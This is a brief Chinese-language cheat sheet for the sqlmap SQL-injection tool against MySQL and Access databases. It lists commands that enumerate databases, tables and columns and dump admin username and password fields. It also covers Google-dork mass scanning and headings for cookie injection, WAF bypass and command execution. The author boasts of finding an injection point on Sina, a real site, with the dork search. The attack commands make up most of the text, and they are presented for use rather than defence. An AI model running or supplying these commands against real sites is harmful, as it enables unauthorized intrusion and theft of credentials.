sqlmap mysql 命令
http://www.jb51.net/softjc/63593.html
cookie 参数:
--cookie="aa=1;bb=2"
写文件 注意:当sqlmap结束运行后,所产生的文件会自动删除
参数:-g
sqlmap可以测试注入Google的搜索结果中的GET参数(只获取前100个结果)。
例子:
python sqlmap.py -g "inurl:\".php?id=1\""
(很牛B的功能,测试了一下,第十几个就找到新浪的一个注入点)
分析其使用场景
cookie 注入
post 注入。
伪静态注入。 什么场景下使用?
命令执行 。
请求延时 场景:
google 搜索 : sqlmap -g inurl:php?id
绕过waf
一: Access数据库注入
sqlmap.py -u "URL" --tables #跑表
sqlmap.py -u "URL" --columns -T admin #对admin表里的字段猜解
sqlmap.py -u "URL" --dump -T admin -C "username,password" #列出admin表里面username,passwrod的内容
二:Mysql数据库注入
sqlmap.py -u "URL" --dbs #猜解数据库
sqlmap.py -u "URL" -D mysl #mysl是猜解出来的数据库,-D 指定一个数据库
sqlmap.py -u "URL" -D mysl -T my_admin --columns #获取my_admin表里面的字段,
sqlmap.py -u "URL" -D mysl -T my_admin -C id,user,password #获取id,user,password的内容